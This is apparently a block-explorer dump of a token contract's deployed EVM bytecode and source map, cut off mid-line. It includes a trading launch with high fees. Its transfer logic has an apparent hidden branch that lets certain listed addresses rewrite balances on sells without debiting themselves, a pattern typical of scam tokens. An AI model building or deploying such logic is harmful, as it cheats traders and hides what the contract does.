0x6080604052600436106100dc575f3560e01c8063751039fc1161007c578063a844e5fb11610057578063a844e5fb1461026c578063a9059cbb14610280578063dd62ed3e1461029f578063e0dca26e146102e3575f80fd5b8063751039fc146102045780638da5cb5b1461021857806395d89b411461023e575f80fd5b806323b872dd116100b757806323b872dd14610180578063313ce5671461019f57806370a08231146101ba578063715018a6146101ee575f80fd5b806306fdde03146100e7578063095ea7b31461012f57806318160ddd1461015e575f80fd5b366100e357005b5f80fd5b3480156100f2575f80fd5b5060408051808201909152600e81526d2230b731b4b73390223930b3b7b760911b60208201525b60405161012691906111ab565b60405180910390f35b34801561013a575f80fd5b5061014e61014936600461120d565b6102f7565b6040519015158152602001610126565b348015610169575f80fd5b5061017261030d565b604051908152602001610126565b34801561018b575f80fd5b5061014e61019a366004611237565b61032d565b3480156101aa575f80fd5b5060405160128152602001610126565b3480156101c5575f80fd5b506101726101d4366004611275565b6001600160a01b03165f9081526003602052604090205490565b3480156101f9575f80fd5b50610202610394565b005b34801561020f575f80fd5b5061020261040e565b348015610223575f80fd5b505f546040516001600160a01b039091168152602001610126565b348015610249575f80fd5b50604080518082019091526006815265222920a3a7a760d11b6020820152610119565b348015610277575f80fd5b50610202610473565b34801561028b575f80fd5b5061014e61029a36600461120d565b61079c565b3480156102aa575f80fd5b506101726102b9366004611290565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b3480156102ee575f80fd5b506102026107a8565b5f6103033384846107dc565b5060015b92915050565b5f61031a6012600a6113bb565b61032890633b9aca006113c9565b905090565b5f6103398484846108ff565b61038a843361038585604051806060016040528060288152602001611524602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610e72565b6107dc565b5060019392505050565b5f546001600160a01b031633146103c65760405162461bcd60e51b81526004016103bd906113e0565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146104375760405162461bcd60e51b81526004016103bd906113e0565b6104436012600a6113bb565b61045190633b9aca006113c9565b6008556104606012600a6113bb565b61046e90633b9aca006113c9565b600955565b5f546001600160a01b0316331461049c5760405162461bcd60e51b81526004016103bd906113e0565b600d54600160a81b900460ff16156105025760405162461bcd60e51b8152602060048201526024808201527f6f70656e54726164696e673a2054726164696e6720697320616c72656164792060448201526337b832b760e11b60648201526084016103bd565b60015461052e9030906001600160a01b03166105206012600a6113bb565b61038590633b9aca006113c9565b60015f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561057e573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105a29190611415565b6001600160a01b031663c9c653963060015f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610601573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106259190611415565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561066f573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106939190611415565b600d80546001600160a01b039283166001600160a01b03199091161790556001541663f305d71947306106da816001600160a01b03165f9081526003602052604090205490565b5f806106ed5f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610753573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906107789190611430565b50506028600655506019600755600d805461ffff60a81b191661010160a81b179055565b5f6103033384846108ff565b5f546001600160a01b031633146107d15760405162461bcd60e51b81526004016103bd906113e0565b5f6006819055600755565b6001600160a01b03831661083e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103bd565b6001600160a01b03821661089f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103bd565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166109635760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103bd565b6001600160a01b0382166109c55760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103bd565b5f8111610a315760405162461bcd60e51b815260206004820152603460248201527f5f7472616e736665723a205472616e7366657220616d6f756e74206d7573742060448201527362652067726561746572207468616e207a65726f60601b60648201526084016103bd565b5f80546001600160a01b03858116911614801590610a5c57505f546001600160a01b03848116911614155b15610d3557600d546001600160a01b038581169116148015610a8c57506001546001600160a01b03848116911614155b8015610ab057506001600160a01b0383165f9081526004602052604090205460ff16155b15610bbd57610ad56064610acf60065485610eaa90919063ffffffff16565b90610f2f565b9050600854821115610b355760405162461bcd60e51b815260206004820152602360248201527f5f7472616e736665723a204578636565647320746865205f6d617854784c696d60448201526234ba1760e91b60648201526084016103bd565b60095482610b57856001600160a01b03165f9081526003602052604090205490565b610b61919061145b565b1115610bbd5760405162461bcd60e51b815260206004820152602560248201527f5f7472616e736665723a204578636565647320746865206d617857616c6c657460448201526429b4bd329760d91b60648201526084016103bd565b600d546001600160a01b038481169116148015610be357506001600160a01b0384163014155b15610c72576001600160a01b0384165f9081526005602052604090205460ff1615610c55576001600160a01b0383165f90815260036020526040902054610c2a908261145b565b610c34908361145b565b6001600160a01b039093165f90815260036020526040902092909255505050565b610c6f6064610acf60075485610eaa90919063ffffffff16565b90505b305f90815260036020526040902054600d54600160a01b900460ff16158015610ca85750600d546001600160a01b038581169116145b8015610cbd5750600d54600160b01b900460ff165b8015610cca5750600a5483115b15610d3357600b548110610ce857610ce3600b54610f70565b610cfb565b600a54811115610cfb57610cfb81610f70565b600c546040516001600160a01b03909116904780156108fc02915f818181858888f19350505050158015610d31573d5f803e3d5ffd5b505b505b8015610dad57305f90815260036020526040902054610d5490826110e0565b305f81815260036020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610da49085815260200190565b60405180910390a35b6001600160a01b0384165f90815260036020526040902054610dcf908361113e565b6001600160a01b0385165f90815260036020526040902055610e12610df4838361113e565b6001600160a01b0385165f90815260036020526040902054906110e0565b6001600160a01b038085165f8181526003602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610e5b858561113e565b60405190815260200160405180910390a350505050565b5f8184841115610e955760405162461bcd60e51b81526004016103bd91906111ab565b505f610ea1848661146e565b95945050505050565b5f825f03610eb957505f610307565b5f610ec483856113c9565b905082610ed18583611481565b14610f285760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016103bd565b9392505050565b5f610f2883836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061117f565b600d805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f81518110610fb657610fb66114a0565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561100d573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110319190611415565b81600181518110611044576110446114a0565b6001600160a01b03928316602091820292909201015260015461106a91309116846107dc565b60015460405163791ac94760e01b81526001600160a01b039091169063791ac947906110a29085905f908690309042906004016114b4565b5f604051808303815f87803b1580156110b9575f80fd5b505af11580156110cb573d5f803e3d5ffd5b5050600d805460ff60a01b1916905550505050565b5f806110ec838561145b565b905083811015610f285760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016103bd565b5f610f2883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610e72565b5f818361119f5760405162461bcd60e51b81526004016103bd91906111ab565b505f610ea18486611481565b5f6020808352835180828501525f5b818110156111d6578581018301518582016040015282016111ba565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461120a575f80fd5b50565b5f806040838503121561121e575f80fd5b8235611229816111f6565b946020939093013593505050565b5f805f60608486031215611249575f80fd5b8335611254816111f6565b92506020840135611264816111f6565b929592945050506040919091013590565b5f60208284031215611285575f80fd5b8135610f28816111f6565b5f80604083850312156112a1575f80fd5b82356112ac816111f6565b915060208301356112bc816111f6565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561131557815f19048211156112fb576112fb6112c7565b8085161561130857918102915b93841c93908002906112e0565b509250929050565b5f8261132b57506001610307565b8161133757505f610307565b816001811461134d576002811461135757611373565b6001915050610307565b60ff841115611368576113686112c7565b50506001821b610307565b5060208310610133831016604e8410600b8410161715611396575081810a610307565b6113a083836112db565b805f19048211156113b3576113b36112c7565b029392505050565b5f610f2860ff84168361131d565b8082028115828204841417610307576103076112c7565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215611425575f80fd5b8151610f28816111f6565b5f805f60608486031215611442575f80fd5b8351925060208401519150604084015190509250925092565b80820180821115610307576103076112c7565b81810381811115610307576103076112c7565b5f8261149b57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b818110156115025784516001600160a01b0316835293830193918301916001016114dd565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212201b424d68510b92701d167b2eed845d82ac5c159b761a78b180f931a44dd40ecc64736f6c63430008150033

Deployed Bytecode Sourcemap

9881:9818:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11683:83;;;;;;;;;;-1:-1:-1;11753:5:0;;;;;;;;;;;;-1:-1:-1;;;11753:5:0;;;;11683:83;;;;;;;:::i;:::-;;;;;;;;13887:161;;;;;;;;;;-1:-1:-1;13887:161:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;13887:161:0;1023:187:1;12282:100:0;;;;;;;;;;;;;:::i;:::-;;;1361:25:1;;;1349:2;1334:18;12282:100:0;1215:177:1;14407:313:0;;;;;;;;;;-1:-1:-1;14407:313:0;;;;;:::i;:::-;;:::i;12090:83::-;;;;;;;;;;-1:-1:-1;12090:83:0;;10164:2;2000:36:1;;1988:2;1973:18;12090:83:0;1858:184:1;12578:119:0;;;;;;;;;;-1:-1:-1;12578:119:0;;;;;:::i;:::-;-1:-1:-1;;;;;12671:18:0;12644:7;12671:18;;;:9;:18;;;;;;;12578:119;7152:148;;;;;;;;;;;;;:::i;:::-;;19418:128;;;;;;;;;;;;;:::i;6602:79::-;;;;;;;;;;-1:-1:-1;6640:7:0;6667:6;6602:79;;-1:-1:-1;;;;;6667:6:0;;;2445:51:1;;2433:2;2418:18;6602:79:0;2299:203:1;11876:87:0;;;;;;;;;;-1:-1:-1;11948:7:0;;;;;;;;;;;;-1:-1:-1;;;11948:7:0;;;;11876:87;;18359:724;;;;;;;;;;;;;:::i;12979:167::-;;;;;;;;;;-1:-1:-1;12979:167:0;;;;;:::i;:::-;;:::i;13437:143::-;;;;;;;;;;-1:-1:-1;13437:143:0;;;;;:::i;:::-;-1:-1:-1;;;;;13545:18:0;;;13518:7;13545:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;13437:143;19091:95;;;;;;;;;;;;;:::i;13887:161::-;13962:4;13979:39;581:10;14002:7;14011:6;13979:8;:39::i;:::-;-1:-1:-1;14036:4:0;13887:161;;;;;:::o;12282:100::-;12335:7;10226:13;10164:2;10226;:13;:::i;:::-;10213:26;;:10;:26;:::i;:::-;12355:19;;12282:100;:::o;14407:313::-;14505:4;14522:36;14532:6;14540:9;14551:6;14522:9;:36::i;:::-;14569:121;14578:6;581:10;14600:89;14638:6;14600:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;14600:19:0;;;;;;:11;:19;;;;;;;;581:10;14600:33;;;;;;;;;;:37;:89::i;:::-;14569:8;:121::i;:::-;-1:-1:-1;14708:4:0;14407:313;;;;;:::o;7152:148::-;6814:6;;-1:-1:-1;;;;;6814:6:0;581:10;6814:22;6806:67;;;;-1:-1:-1;;;6806:67:0;;;;;;;:::i;:::-;;;;;;;;;7259:1:::1;7243:6:::0;;7222:40:::1;::::0;-1:-1:-1;;;;;7243:6:0;;::::1;::::0;7222:40:::1;::::0;7259:1;;7222:40:::1;7290:1;7273:19:::0;;-1:-1:-1;;;;;;7273:19:0::1;::::0;;7152:148::o;19418:128::-;6814:6;;-1:-1:-1;;;;;6814:6:0;581:10;6814:22;6806:67;;;;-1:-1:-1;;;6806:67:0;;;;;;;:::i;:::-;10226:13:::1;10164:2;10226;:13;:::i;:::-;10213:26;::::0;:10:::1;:26;:::i;:::-;19472:11;:26:::0;10226:13:::1;10164:2;10226;:13;:::i;:::-;10213:26;::::0;:10:::1;:26;:::i;:::-;19509:14;:29:::0;19418:128::o;18359:724::-;6814:6;;-1:-1:-1;;;;;6814:6:0;581:10;6814:22;6806:67;;;;-1:-1:-1;;;6806:67:0;;;;;;;:::i;:::-;18424:14:::1;::::0;-1:-1:-1;;;18424:14:0;::::1;;;18423:15;18415:64;;;::::0;-1:-1:-1;;;18415:64:0;;5151:2:1;18415:64:0::1;::::0;::::1;5133:21:1::0;5190:2;5170:18;;;5163:30;5229:34;5209:18;;;5202:62;-1:-1:-1;;;5280:18:1;;;5273:34;5324:19;;18415:64:0::1;4949:400:1::0;18415:64:0::1;18524:10;::::0;18492:58:::1;::::0;18509:4:::1;::::0;-1:-1:-1;;;;;18524:10:0::1;10226:13;10164:2;10226;:13;:::i;:::-;10213:26;::::0;:10:::1;:26;:::i;18492:58::-;18594:10;;;;;;;;;-1:-1:-1::0;;;;;18594:10:0::1;-1:-1:-1::0;;;;;18594:18:0::1;;:20;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;18576:50:0::1;;18635:4;18642:10;;;;;;;;;-1:-1:-1::0;;;;;18642:10:0::1;-1:-1:-1::0;;;;;18642:15:0::1;;:17;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18576:84;::::0;-1:-1:-1;;;;;;18576:84:0::1;::::0;;;;;;-1:-1:-1;;;;;5840:15:1;;;18576:84:0::1;::::0;::::1;5822:34:1::0;5892:15;;5872:18;;;5865:43;5757:18;;18576:84:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18561:12;:99:::0;;-1:-1:-1;;;;;18561:99:0;;::::1;-1:-1:-1::0;;;;;;18561:99:0;;::::1;;::::0;;;18719:10;::::1;:26;18767:21;18822:4;18842:24;18822:4:::0;-1:-1:-1;;;;;12671:18:0;12644:7;12671:18;;;:9;:18;;;;;;;12578:119;18842:24:::1;18881:1;18897::::0;18913:7:::1;6640::::0;6667:6;-1:-1:-1;;;;;6667:6:0;;6602:79;18913:7:::1;18719:242;::::0;::::1;::::0;;;-1:-1:-1;;;;;;18719:242:0;;;-1:-1:-1;;;;;6278:15:1;;;18719:242:0::1;::::0;::::1;6260:34:1::0;6310:18;;;6303:34;;;;6353:18;;;6346:34;;;;6396:18;;;6389:34;6460:15;;;6439:19;;;6432:44;18935:15:0::1;6492:19:1::0;;;6485:35;6194:19;;18719:242:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;18986:2:0::1;18974:9;:14:::0;-1:-1:-1;19012:2:0::1;18999:10;:15:::0;19025:14:::1;:21:::0;;-1:-1:-1;;;;19057:18:0;-1:-1:-1;;;19057:18:0;;;18359:724::o;12979:167::-;13057:4;13074:42;581:10;13098:9;13109:6;13074:9;:42::i;19091:95::-;6814:6;;-1:-1:-1;;;;;6814:6:0;581:10;6814:22;6806:67;;;;-1:-1:-1;;;6806:67:0;;;;;;;:::i;:::-;19152:1:::1;19140:9;:13:::0;;;19164:10:::1;:14:::0;19091:95::o;15027:335::-;-1:-1:-1;;;;;15120:19:0;;15112:68;;;;-1:-1:-1;;;15112:68:0;;7044:2:1;15112:68:0;;;7026:21:1;7083:2;7063:18;;;7056:30;7122:34;7102:18;;;7095:62;-1:-1:-1;;;7173:18:1;;;7166:34;7217:19;;15112:68:0;6842:400:1;15112:68:0;-1:-1:-1;;;;;15199:21:0;;15191:68;;;;-1:-1:-1;;;15191:68:0;;7449:2:1;15191:68:0;;;7431:21:1;7488:2;7468:18;;;7461:30;7527:34;7507:18;;;7500:62;-1:-1:-1;;;7578:18:1;;;7571:32;7620:19;;15191:68:0;7247:398:1;15191:68:0;-1:-1:-1;;;;;15270:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15322:32;;1361:25:1;;;15322:32:0;;1334:18:1;15322:32:0;;;;;;;15027:335;;;:::o;15641:2101::-;-1:-1:-1;;;;;15730:18:0;;15722:68;;;;-1:-1:-1;;;15722:68:0;;7852:2:1;15722:68:0;;;7834:21:1;7891:2;7871:18;;;7864:30;7930:34;7910:18;;;7903:62;-1:-1:-1;;;7981:18:1;;;7974:35;8026:19;;15722:68:0;7650:401:1;15722:68:0;-1:-1:-1;;;;;15809:18:0;;15801:66;;;;-1:-1:-1;;;15801:66:0;;8258:2:1;15801:66:0;;;8240:21:1;8297:2;8277:18;;;8270:30;8336:34;8316:18;;;8309:62;-1:-1:-1;;;8387:18:1;;;8380:33;8430:19;;15801:66:0;8056:399:1;15801:66:0;15894:1;15886:5;:9;15878:74;;;;-1:-1:-1;;;15878:74:0;;8662:2:1;15878:74:0;;;8644:21:1;8701:2;8681:18;;;8674:30;8740:34;8720:18;;;8713:62;-1:-1:-1;;;8791:18:1;;;8784:50;8851:19;;15878:74:0;8460:416:1;15878:74:0;15965:17;6667:6;;-1:-1:-1;;;;;16092:15:0;;;6667:6;;16092:15;;;;:34;;-1:-1:-1;6640:7:0;6667:6;-1:-1:-1;;;;;16111:15:0;;;6667:6;;16111:15;;16092:34;16088:1159;;;16155:12;;-1:-1:-1;;;;;16147:20:0;;;16155:12;;16147:20;:51;;;;-1:-1:-1;16187:10:0;;-1:-1:-1;;;;;16171:27:0;;;16187:10;;16171:27;;16147:51;:75;;;;-1:-1:-1;;;;;;16203:19:0;;;;;;:13;:19;;;;;;;;16202:20;16147:75;16143:354;;;16255:29;16280:3;16255:20;16265:9;;16255:5;:9;;:20;;;;:::i;:::-;:24;;:29::i;:::-;16243:41;;16320:11;;16311:5;:20;;16303:68;;;;-1:-1:-1;;;16303:68:0;;9083:2:1;16303:68:0;;;9065:21:1;9122:2;9102:18;;;9095:30;9161:34;9141:18;;;9134:62;-1:-1:-1;;;9212:18:1;;;9205:33;9255:19;;16303:68:0;8881:399:1;16303:68:0;16425:14;;16416:5;16398:15;16408:4;-1:-1:-1;;;;;12671:18:0;12644:7;12671:18;;;:9;:18;;;;;;;12578:119;16398:15;:23;;;;:::i;:::-;:41;;16390:91;;;;-1:-1:-1;;;16390:91:0;;9617:2:1;16390:91:0;;;9599:21:1;9656:2;9636:18;;;9629:30;9695:34;9675:18;;;9668:62;-1:-1:-1;;;9746:18:1;;;9739:35;9791:19;;16390:91:0;9415:401:1;16390:91:0;16525:12;;-1:-1:-1;;;;;16517:20:0;;;16525:12;;16517:20;:45;;;;-1:-1:-1;;;;;;16541:21:0;;16557:4;16541:21;;16517:45;16513:235;;;-1:-1:-1;;;;;16586:19:0;;;;;;:13;:19;;;;;;;;16583:89;;;-1:-1:-1;;;;;16646:15:0;;;;;;:9;:15;;;;;;16636:25;;:9;:25;:::i;:::-;16627:35;;16628:5;16627:35;:::i;:::-;-1:-1:-1;;;;;16609:15:0;;;;;;;:9;:15;;;;;:53;;;;-1:-1:-1;;;15641:2101:0:o;16583:89::-;16702:30;16728:3;16702:21;16712:10;;16702:5;:9;;:21;;;;:::i;:30::-;16690:42;;16513:235;16807:4;16764:22;12671:18;;;:9;:18;;;;;;16833:9;;-1:-1:-1;;;16833:9:0;;;;16832:10;:34;;;;-1:-1:-1;16854:12:0;;-1:-1:-1;;;;;16846:20:0;;;16854:12;;16846:20;16832:34;:49;;;;-1:-1:-1;16870:11:0;;-1:-1:-1;;;16870:11:0;;;;16832:49;:75;;;;;16893:14;;16885:5;:22;16832:75;16828:408;;;16950:14;;16932;:32;16928:228;;16989:31;17005:14;;16989:15;:31::i;:::-;16928:228;;;17066:14;;17049;:31;17046:110;;;17105:31;17121:14;17105:15;:31::i;:::-;17174:14;;:46;;-1:-1:-1;;;;;17174:14:0;;;;17198:21;17174:46;;;;;:14;:46;:14;:46;17198:21;17174:14;:46;;;;;;;;;;;;;;;;;;;;;16828:408;16128:1119;16088:1159;17334:13;;17330:172;;17409:4;17391:24;;;;:9;:24;;;;;;:39;;17420:9;17391:28;:39::i;:::-;17382:4;17364:24;;;;:9;:24;;;;;;;:66;;;;17450:40;;-1:-1:-1;;;;;17450:40:0;;;;;;;17480:9;1361:25:1;;1349:2;1334:18;;1215:177;17450:40:0;;;;;;;;17330:172;-1:-1:-1;;;;;17580:15:0;;;;;;:9;:15;;;;;;:26;;17600:5;17580:19;:26::i;:::-;-1:-1:-1;;;;;17562:15:0;;;;;;:9;:15;;;;;:44;17635:41;17655:20;:5;17665:9;17655;:20::i;:::-;-1:-1:-1;;;;;17635:15:0;;;;;;:9;:15;;;;;;;:19;:41::i;:::-;-1:-1:-1;;;;;17617:15:0;;;;;;;:9;:15;;;;;:59;;;;17692:42;;;17713:20;:5;17723:9;17713;:20::i;:::-;17692:42;;1361:25:1;;;1349:2;1334:18;17692:42:0;;;;;;;15711:2031;15641:2101;;;:::o;4501:190::-;4587:7;4623:12;4615:6;;;;4607:29;;;;-1:-1:-1;;;4607:29:0;;;;;;;;:::i;:::-;-1:-1:-1;4647:9:0;4659:5;4663:1;4659;:5;:::i;:::-;4647:17;4501:190;-1:-1:-1;;;;;4501:190:0:o;4931:246::-;4989:7;5013:1;5018;5013:6;5009:47;;-1:-1:-1;5043:1:0;5036:8;;5009:47;5066:9;5078:5;5082:1;5078;:5;:::i;:::-;5066:17;-1:-1:-1;5111:1:0;5102:5;5106:1;5066:17;5102:5;:::i;:::-;:10;5094:56;;;;-1:-1:-1;;;5094:56:0;;10378:2:1;5094:56:0;;;10360:21:1;10417:2;10397:18;;;10390:30;10456:34;10436:18;;;10429:62;-1:-1:-1;;;10507:18:1;;;10500:31;10548:19;;5094:56:0;10176:397:1;5094:56:0;5168:1;4931:246;-1:-1:-1;;;4931:246:0:o;5383:132::-;5441:7;5468:39;5472:1;5475;5468:39;;;;;;;;;;;;;;;;;:3;:39::i;17880:467::-;11043:9;:16;;-1:-1:-1;;;;11043:16:0;-1:-1:-1;;;11043:16:0;;;17981::::1;::::0;;17995:1:::1;17981:16:::0;;;;;::::1;::::0;;-1:-1:-1;;17981:16:0::1;::::0;::::1;::::0;;::::1;::::0;::::1;;::::0;-1:-1:-1;17981:16:0::1;17957:40;;18026:4;18008;18013:1;18008:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;18008:23:0;;::::1;:7;::::0;;::::1;::::0;;;;;;:23;;;;18052:10:::1;::::0;:17:::1;::::0;;-1:-1:-1;;;18052:17:0;;;;:10;;;::::1;::::0;:15:::1;::::0;:17:::1;::::0;;::::1;::::0;18008:7;;18052:17;;;;;:10;:17:::1;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18042:4;18047:1;18042:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;18042:27:0;;::::1;:7;::::0;;::::1;::::0;;;;;:27;18112:10:::1;::::0;18080:57:::1;::::0;18097:4:::1;::::0;18112:10:::1;18125:11:::0;18080:8:::1;:57::i;:::-;18148:10;::::0;:191:::1;::::0;-1:-1:-1;;;18148:191:0;;-1:-1:-1;;;;;18148:10:0;;::::1;::::0;:61:::1;::::0;:191:::1;::::0;18224:11;;18148:10:::1;::::0;18266:4;;18293::::1;::::0;18313:15:::1;::::0;18148:191:::1;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;-1:-1:-1::0;;11082:9:0;:17;;-1:-1:-1;;;;11082:17:0;;;-1:-1:-1;;;;17880:467:0:o;3590:179::-;3648:7;;3680:5;3684:1;3680;:5;:::i;:::-;3668:17;;3709:1;3704;:6;;3696:46;;;;-1:-1:-1;;;3696:46:0;;12029:2:1;3696:46:0;;;12011:21:1;12068:2;12048:18;;;12041:30;12107:29;12087:18;;;12080:57;12154:18;;3696:46:0;11827:351:1;4026:136:0;4084:7;4111:43;4115:1;4118;4111:43;;;;;;;;;;;;;;;;;:3;:43::i;5803:189::-;5889:7;5924:12;5917:5;5909:28;;;;-1:-1:-1;;;5909:28:0;;;;;;;;:::i;:::-;-1:-1:-1;5948:9:0;5960:5;5964:1;5960;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;622:70;567:131;:::o;703:315::-;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:247::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;2214:9;2201:23;2233:31;2258:5;2233:31;:::i;2507:388::-;2575:6;2583;2636:2;2624:9;2615:7;2611:23;2607:32;2604:52;;;2652:1;2649;2642:12;2604:52;2691:9;2678:23;2710:31;2735:5;2710:31;:::i;:::-;2760:5;-1:-1:-1;2817:2:1;2802:18;;2789:32;2830:33;2789:32;2830:33;:::i;:::-;2882:7;2872:17;;;2507:388;;;;;:::o;2900:127::-;2961:10;2956:3;2952:20;2949:1;2942:31;2992:4;2989:1;2982:15;3016:4;3013:1;3006:15;3032:422;3121:1;3164:5;3121:1;3178:270;3199:7;3189:8;3186:21;3178:270;;;3258:4;3254:1;3250:6;3246:17;3240:4;3237:27;3234:53;;;3267:18;;:::i;:::-;3317:7;3307:8;3303:22;3300:55;;;3337:16;;;;3300:55;3416:22;;;;3376:15;;;;3178:270;;;3182:3;3032:422;;;;;:::o;3459:806::-;3508:5;3538:8;3528:80;;-1:-1:-1;3579:1:1;3593:5;;3528:80;3627:4;3617:76;;-1:-1:-1;3664:1:1;3678:5;;3617:76;3709:4;3727:1;3722:59;;;;3795:1;3790:130;;;;3702:218;;3722:59;3752:1;3743:10;;3766:5;;;3790:130;3827:3;3817:8;3814:17;3811:43;;;3834:18;;:::i;:::-;-1:-1:-1;;3890:1:1;3876:16;;3905:5;;3702:218;;4004:2;3994:8;3991:16;3985:3;3979:4;3976:13;3972:36;3966:2;3956:8;3953:16;3948:2;3942:4;3939:12;3935:35;3932:77;3929:159;;;-1:-1:-1;4041:19:1;;;4073:5;;3929:159;4120:34;4145:8;4139:4;4120:34;:::i;:::-;4190:6;4186:1;4182:6;4178:19;4169:7;4166:32;4163:58;;;4201:18;;:::i;:::-;4239:20;;3459:806;-1:-1:-1;;;3459:806:1:o;4270:140::-;4328:5;4357:47;4398:4;4388:8;4384:19;4378:4;4357:47;:::i;4415:168::-;4488:9;;;4519;;4536:15;;;4530:22;;4516:37;4506:71;;4557:18;;:::i;4588:356::-;4790:2;4772:21;;;4809:18;;;4802:30;4868:34;4863:2;4848:18;;4841:62;4935:2;4920:18;;4588:356::o;5354:251::-;5424:6;5477:2;5465:9;5456:7;5452:23;5448:32;5445:52;;;5493:1;5490;5483:12;5445:52;5525:9;5519:16;5544:31;5569:5;5544:31;:::i;6531:306::-;6619:6;6627;6635;6688:2;6676:9;6667:7;6663:23;6659:32;6656:52;;;6704:1;6701;6694:12;6656:52;6733:9;6727:16;6717:26;;6783:2;6772:9;6768:18;6762:25;6752:35;;6827:2;6816:9;6812:18;6806:25;6796:35;;6531:306;;;;;:::o;9285:125::-;9350:9;;;9371:10;;;9368:36;;;9384:18;;:::i;9821:128::-;9888:9;;;9909:11;;;9906:37;;;9923:18;;:::i;9954:217::-;9994:1;10020;10010:132;;10064:10;10059:3;10055:20;1